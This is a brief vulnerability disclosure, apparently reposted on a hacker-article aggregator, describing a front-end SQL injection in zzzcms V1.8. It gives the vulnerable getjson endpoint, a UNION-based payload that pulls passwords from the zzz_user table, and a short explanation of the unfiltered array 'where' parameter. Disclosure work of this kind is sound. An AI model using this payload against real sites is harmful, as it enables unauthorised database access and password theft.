记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

zzzcmsV1.8 前台某处SQL注入漏洞

2021-10-13 04:33

Injection point: 

http://127.0.0.1/zzzphp/form/index.php?module=getjson

payload:table=gbook&where[]=1=1 union select password from zzz_user&col=1

Analysis:

In the file:

https://github.com/h4ckdepy/zzzphp/blob/master/form/index.php 

line262,get_json() method supports execution through the getmodule() method and when the value of the $act variable is getjson. At this time, it will get the URL as follows: 

http://127.0.0.1/zzzphp/form/index.php?module=getjson 

And in the where parameter, the array can be used to bypass the restriction, and there is no SQL injection filter on the parameter, resulting in SQL injection.


知识来源: https://blog.happysec.cn/index/view/271.jsp

阅读:26020 | 评论:0 | 标签:注入 cms 漏洞 SQL

想收藏或者和大家分享这篇好文章→复制链接地址

“zzzcmsV1.8 前台某处SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求打赏·赞助·支持💖

标签云